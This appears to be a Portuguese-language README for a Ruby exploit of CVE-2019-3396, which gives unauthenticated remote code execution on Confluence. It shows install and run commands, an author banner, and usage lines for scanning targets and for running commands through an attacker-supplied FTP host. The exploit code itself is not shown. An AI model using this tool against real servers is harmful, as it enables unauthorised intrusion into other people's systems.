
Exploit em Ruby para CVE-2019-3396 que permite execução remota de código não autenticada no Confluence, incluindo varredura de alvos e execução de comandos por meio de um servidor FTP.

bundle install
┌──(user㉿hostname)-[~/path/to/cve-2019-3396]
└─$ ruby cve-2019-3396.rb
exploit -> CVE-2019-3396
Author -> Abdallah Mohamed Elsharif
Greetz to Ghost5egy and Hamza Abdulrahman and Omar and Alaa
Usage:
ruby cve-2019-3396.rb [options] Or --help
ruby cve-2019-3396.rb -t TARGET --scan
ruby cve-2019-3396.rb -t TARGET --ftp-serv FTPHOST -c COMMAND